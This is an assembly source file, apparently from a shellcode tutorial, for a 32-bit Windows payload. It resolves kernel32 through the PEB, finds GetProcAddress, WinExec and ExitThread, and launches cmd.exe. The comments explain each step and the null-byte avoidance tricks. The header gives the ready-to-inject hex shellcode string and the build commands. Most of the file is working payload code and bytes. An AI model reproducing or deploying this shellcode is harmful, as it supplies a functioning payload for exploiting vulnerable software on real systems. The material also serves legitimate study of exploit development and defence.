;Full tutorial: https://www.zinzloun.info [#Windows CMD shellcode] ;COMPILE: ;nasm.exe [-f win32] dynamic.asm -o dynamic.obj ;SKIP -f win32 to create the .obj file to extract eventually the hex code ;then execute: [python bin2hex.py dynamic.obj] to get the hex code: ;"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x40\x1c\x8b\x04\x08" ;"\x8b\x04\x08\x8b\x58\x08\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01" ;"\xda\x8b\x72\x20\x01\xde\x41\xad\x01\xd8\x81\x38\x47\x65\x74" ;"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08" ;"\x64\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c" ;"\x4e\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd6\x31\xc9" ;"\x51\x68\x45\x78\x65\x63\x68\x41\x57\x69\x6e\x89\xe1\x8d\x49" ;"\x01\x51\x53\xff\xd6\x87\xfa\x89\xc7\x31\xc9\x51\x68\x72\x65" ;"\x61\x64\x68\x69\x74\x54\x68\x68\x41\x41\x45\x78\x89\xe1\x8d" ;"\x49\x02\x51\x53\xff\xd6\x89\xc6\x31\xc9\x51\x68\x65\x78\x65" ;"\x20\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x01\x51\xff\xd7\x31\xc9" ;"\x51\xff\xd6" ;you can download the python script here: https://github.com/zinzloun/infoSec/blob/master/bin2hex.py ;LINK ;GoLink.exe /console /entry _start dynamic.obj ;IF THE obj FILE IS NOT CREATED WITH THE -f win32 GoLink will COMPLAIN ;Tested and coded on Win10 Home edition 64, tested also on: Win7 EE 32, Win Srv 2012 R2 64 [BITS 32] [SECTION .text] global _start _start: ;FIND Kernel32 BASE ADDRESS xor ecx, ecx ; trick to avoid null byte MOV EAX,[FS:0x30], we add ecx MOV EAX, [FS:ecx+0x30] ; EAX = PEB MOV EAX, [eax+0x0C] ; EAX = PEB->Ldr MOV EAX, [EAX+0x1C] ; EAX = PEB->Ldr.InInitializationOrderModuleList.Flink ; Start to move the pointer 2 positions ahead mov eax, [eax+ecx] ; EAX = LDR 2nd entry -> KernelBA * + ecx to avoid NULL mov eax, [eax+ecx] ; EAX = LDR 3rd entry -> Kernel32 ; End move MOV EBX, [EAX+8] ; EBX = LDR_MODULE's BaseAddress Kernel32 ;Find the EXPORT TABLE of kernel32.dll mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew (offset 60) add edx, ebx ; EDX = PE Header (1) mov edx, [edx + 0x78] ; EDX = Offset export table (offset 120) add edx, ebx ; EDX = Export table (data type IMAGE_EXPORT_DIRECTORY) (2), we will use this value later (*) mov esi, [edx + 0x20] ; ESI = Relative offset to AddressOfNames add esi, ebx ; ESI = AddressOfNames (3) ;Find GetProcAddress function name (the ordinal) Find_GetProc: inc ecx ; Increment the counter (we start from 1) ; lodsd instruction will follow the pointer specified by the ESI register and set result in the EAX, this means that after the lodsd ; instruction we will have the offset of the current name function in EAX. ; the instruction will also increment the esi register value with 4, so ESI will already point to next function name offset lodsd add eax, ebx ; Get function name (offset + base a) cmp dword [eax], 0x50746547 ; PteG ->search first 4 bytes of the string GetProcAddre in little-endian format jnz Find_GetProc cmp dword [eax + 0x4], 0x41636f72 ; Acor ->other 4 bytes jnz Find_GetProc cmp dword [eax + 0x8], 0x65726464 ; erdd ->other 4 bytes. At this point even without checking the last 2 bytes (ss) of the function name we assume it is GetProcAddress jnz Find_GetProc dec ecx ; we start counting from 1 but the adrress index start from 0 so we need to decrement ECX ; now ECX points to the array index of AddressOfNames and we can obtain the ordinal value in this way: AddressOfNameOrdinals[ecx] = ordinal ;Find the address of GetProcAddress function mov esi, [edx + 0x24] ; ESI = Offset to AddressOfNameOrdinals (4)(*) add esi, ebx ; ESI = AddressOfNameOrdinals mov cx, [esi + ecx * 2] ; CX (lower word of ECX 16bit) = AddressOfNameOrdinals contains two byte numbers value (the ordinal), so we only need of the lower word of ECX ; CX (16bit == 2byte). This value is the link (the index) to the AddressOfFunctions ; so CX now points to the Number of function (ordinal) that corresponds to the GetProcAddress address value in the AddressOfFunctions mov esi, [edx + 0x1c] ; ESI = Offset to AddressOfFunctions (5) add esi, ebx ; ESI = AddressOfFunctions mov edx, [esi + ecx * 4] ; EDX = Offset to GetProcAddress function address: AddressOfFunctions[ecx*4] ; We set ecx * 4 because each address pointer has 4 bytes reserved and ESI points to the beginning of AddressOfFunctions array add edx, ebx ; EDX = GetProcAddress ;EDX WILL CHANGE AFTER THE CALL mov esi, edx ; store GetProcAddress in ESI ;Finding address of Winexec calling GetProcAddress(base kernel32,"Winexec\0") xor ecx,ecx push ecx ;another trick to avoid null bytes: prefix the Winexec string with A to keep the stack aligned without null ;we load AWinexec push 0x63657845 push 0x6e695741 mov ecx,esp lea ecx, [ecx+1] ; get rid of 41(A) push ecx ; Winexec\0 push ebx ; Base kernel32 call esi ;Call GetProcAddress: the return result is saved in EAX xchg edi,edx mov edi, eax;save Winexec address in EDI ;Finding address of ExitThread calling GetProcAddress(base kernel32,"ExitThread\0") xor ecx,ecx push ecx ;the same trick used before for WinExec PUSH 0x64616572 PUSH 0x68547469 PUSH 0x78454141 mov ecx,esp lea ecx, [ecx+2] ; get rid of 4141(AA) push ecx ; ExitThread\0 push ebx ; Base kernel32 call esi ;Call GetProcAddress: the return result is saved in EAX mov esi, eax;save ExitThread address in esi (overwrite GetProcAddress since we don't need anymore) ;Finally call cmd.exe\0 xor ecx,ecx push ecx push 0x20657865 push 0x2e646d63 mov ecx,esp ; "cmd.exe \0" push 0x1 ; windows style push ecx call edi ; WinExec("cmd.exe \0",1) ;exit clean xor ecx,ecx push ecx call esi ; ExitThread(0)